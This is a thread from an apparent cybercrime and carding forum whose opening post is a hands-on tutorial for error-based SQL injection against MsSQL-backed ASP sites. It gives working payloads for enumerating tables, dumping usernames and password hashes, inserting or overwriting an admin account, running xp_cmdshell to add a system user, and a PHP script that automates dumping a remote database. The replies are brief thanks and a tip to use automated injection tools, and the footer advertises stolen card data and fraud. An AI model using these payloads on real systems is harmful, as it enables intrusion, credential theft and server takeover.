If you have any questions, contact us:
Telegram:maintex
ICQ:1607000

  #1 Old 08-31-2013, 05:30 PM
Cartographer
 
Cartographer's Avatar
 
Join Date: Aug 2013
Posts: 511
Cartographer is on a distinguished road
Default Tutorial Injection MsSQL - Complete

DISCLAIMER:THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSE FOR PROTECTING YOUR OWN CODE FROM SQL INJECTIONS. YOU WILL HAVE TO TAKE THE FULL RESPONSIBILITY FOR ANY ACTION U DO AFTER READING THIS TUTORIAL.

Background

This article entitled "Complete MsSQL Injection For Newbies" intends to provide the complete knowledge and work-how of SQL injection specially targeted on MsSQL(ASP+IIS, because "it" occurs most frequently) database except the stacked query parts. First contribution over here...

0x00 The error output

Will be used only to cover injection, building queries and stuff like that, will not be described.
To begin, I want to see if we have found a bug, it does not necessarily mean that there is an injection. To check try to bring the version of MsSQL.

Target:
Code:
http://site.com/script.asp?id=5'
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '5'.
/file.asp, line 1000
Errors may be different, depending on what is processed MsSQL (php, asp, cfm).

Obtain Version:
Code:
5' or 1=@@version--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3080.00 (Intel X86) Sep 6 2009 01:43:32 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to a column of data type int.
/file.asp, line 1000
The database name of the current user:
Code:
id=5' or 1=(select db_name())--
The user name of the owner of this base.
Code:
id=5' or 1=(select system_user)-- =>
0x01 Search the tables and columns.

Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'table_name' to a column of data type int.
/file.asp, line 1000
Where table_name => name of the first table. How do you get the name of the 5th table? In MSSQL there is no function "limit", but there are other output options.

The first method. Using the method of exclusion (with the names of the tables).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table_name1','table_name4',table_name3','table_name4'))--
The second method. With the exception of the method (without specifying the table names).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+4+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--
The third method. With the help of the mathematical symbol ">" (with the "last" of the selected table.) In this method, then you can get at least 53423rd entry in the table, then we can not do option 1 and 2, because MsSQL trying to go through all the selected records that we want to avoid a NOT IN (more than 500 entries, the database is begins to slow down a good idea)).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>'table_name4')--
Column we obtain the same, only with a table COLUMNS

0x02 Data output

Suppose in the Users table is a column id (int), username (varchar), password (binary).
In order to display different types of data, we will have to use the data type conversion (cast, convert, etc ..)

We derive the first entry in the column id
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users)--
In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1' to data type int.
/inc/file.asp, line 104
Sometimes the conversion function can not solve the problem, then the data can be displayed through the function which is used to convert selected data in XML format -> "FOR XML PATH", (since 2005 versions of MSSQL-Server) -> this function, we shall return.

Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users+FOR+XML+PATH(''))--
It seems to have had more opportunity to withdraw without any tags, but forgot something like )=

Now let's take a cell from the column password, it seemed to be working well "cast (password + as + binary), but there are times when the FOR XML PATH, cast or convert does not give the desired result. Then you can search and other functions that are yet to nowhere not described. one of them. (".." - analog for access to the system table => 'dbo').
Code:
5'+or+1=(select+top+1+master..fn_varbintohexstr(password)+from+Users)--.
Now let's take just three cells with 3 different columns at a time (no mssql functions like concat () - in mysql, but here it is possible to connect dumb output in a single cell using the "%2B':'%2B". If my suspicions are correct, then the %2B(+) was interpreted as a MsSQL +(plus), not as a gap, due to which the union takes place).
Code:
5'+or+1=(SELECT+TOP+1+cast(id+as+nvarchar)%2B':'%2Bconvert(nvarchar,username)%2B':'%2Bmaster..fn_varbintohexstr(password)+FROM+Users)--
If all types of displays without errors, it can be so... TOP+1+id%2B':'%2Busername%2B':'%2Bpassword ... ;

In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1:admin:e075739... ' to data type int.
/inc/file.asp, line 101
Can be a little easier, that is, to nvarchar for all output cells (be careful, quotename will return null, if the output data will be more than 258 bytes -> 128 characters in unicode).

Code:
5'+or+1=(SELECT+TOP+1+quotename(id%2B':'%2Busername)+FROM+Users)--
If the filter/magic_quotes, then change like this:

Code:
5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115))--
0x03 Insert & Update

There is another plus in MsSQL + IIS, is that very often we can "tear off" a request by the sign ";" and then create a new one.

Everything is done in much the same.

Code:
5';+INSERT+INTO+Users+(id,username,pass)+VALUE+(1,'admin','mypass')--
Code:
5';+UPDATE+Users+set+password='mypass'+where+username='admin'--
The commands are executed.

If you have enough rights, usually the user "sa" (root in mysql), you can try to do something of the following commands:


How do I use ? Very simple, kill the request with a ";" and then create your request:
Code:
5';exec master..xp_cmdshell 'dir c:\'--
Code:
5';exec master..xp_cmdshell 'net user admin password /add'--
Bypassing the quotes:
Code:
5';exec master..xp_cmdshell [net user admin password /add]--
0x04 Dump

Theoretically, once drained the entire database via injection without the knowledge of database structure, it is impossible. But you can get information in the following ways. First, parse, 1 request - 1 record (later lay a parser). Second, the function to parse through the FOR XML RAW (it's ~ 2000 characters per request), the script will spread. Taken from pastebin.com

Code:
<?php
$host = "www.test.net";
$port = 80;
for($i=$j=0;;$i+=1990,$j++) {
    $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
    $p.= "Host: $host\r\n";
    $p.= "Connection: close\r\n\r\n";
    $ock = fsockopen(gethostbyname($host), $port);
    if(!$ock) {
        return false;
    }
    fputs($ock, $p);
    $html='';
    while(!feof($ock)) {
        $html.= fgets($ock);
    }
    $html = explode("\r\n\r\n",$html);
    if(stripos($html[1],'type mismatch')!==false) {
        break;
    }
    $out = array();
    preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
    if(isset($out[1])) {
        $xml .= htmlspecialchars_decode($out[1]);
    } else {
        break;
    }
}
$r = xml_parser_create();
$out = array();
xml_parse_into_struct($r, '<root>'.$xml, $out);
foreach($out as $el) {
    echo $el['attributes']['E']."\r\n";
}
Cartographer is offline   Reply With Quote
  #2 Old 10-03-2013, 06:06 AM
virus_worm
 
virus_worm's Avatar
 
Join Date: Oct 2013
Posts: 2
virus_worm is an unknown quantity at this point
Default

Old tutorial bro
but thank anyway for your post
but i advice , if you use by hands ,
this method make you very tired
So sometimes u should use tool like :Panlogin,Havij tool
virus_worm is offline   Reply With Quote
  #3 Old 10-24-2013, 08:28 AM
YaloS
 
YaloS's Avatar
 
Join Date: Oct 2013
Location: Россия
Posts: 1
YaloS is an unknown quantity at this point
Send a message via ICQ to YaloS
Default

Я думаю, что Вы не правы. Я уверен. Давайте обсудим это. Пишите мне в PM, поговорим.
YaloS is offline   Reply With Quote
  #4 Old 03-19-2016, 10:47 PM
pipip
 
pipip's Avatar
 
Join Date: Mar 2016
Posts: 6
pipip is an unknown quantity at this point
Default

nice tutrial for newbe
pipip is offline   Reply With Quote
  #5 Old 04-07-2016, 08:07 PM
rikketik
 
rikketik's Avatar
 
Join Date: Apr 2016
Posts: 9
rikketik is an unknown quantity at this point
Default

thnxxxxx
rikketik is offline   Reply With Quote
  #6 Old 04-10-2016, 12:24 PM
StalkerBA
 
StalkerBA's Avatar
 
Join Date: Apr 2016
Posts: 5
StalkerBA is an unknown quantity at this point
Default

thank's BRO nice tutrial for newbe
StalkerBA is offline   Reply With Quote
  #7 Old 10-23-2016, 04:31 PM
samefuck
 
samefuck's Avatar
 
Join Date: Oct 2016
Posts: 4
samefuck is an unknown quantity at this point
Default

thanks for share
samefuck is offline   Reply With Quote
  #8 Old 12-08-2016, 04:28 AM
privateparty
 
privateparty's Avatar
 
Join Date: Dec 2016
Posts: 13
privateparty is an unknown quantity at this point
Default

useful info
privateparty is offline   Reply With Quote
  #9 Old 01-25-2017, 12:00 PM
joshupton2015
 
joshupton2015's Avatar
 
Join Date: Jan 2017
Posts: 4
joshupton2015 is an unknown quantity at this point
Default

nice tut thanks alot
joshupton2015 is offline   Reply With Quote
  #10 Old 01-29-2017, 04:52 PM
salahskull
 
salahskull's Avatar
 
Join Date: Jan 2017
Posts: 9
salahskull is an unknown quantity at this point
Default

thank you
salahskull is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Tutorial Oracle SQL Injection - Complete Cartographer Tutorials 2 02-04-2022 09:26 PM
TOYUDesign SQL Injection Vulnerability Cartographer Tutorials 2 04-03-2021 08:34 AM
Php-X-Links Script SQL Injection Vulnerabilitiy Cartographer Tutorials 3 03-20-2021 10:39 AM
TUTORIAL**CC>UKASH>LR tutorial * Cartographer Tutorials 2 11-10-2015 05:57 AM
Заливка шелла через MySQL Injection Cartographer Статьи 0 08-22-2013 09:55 PM


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz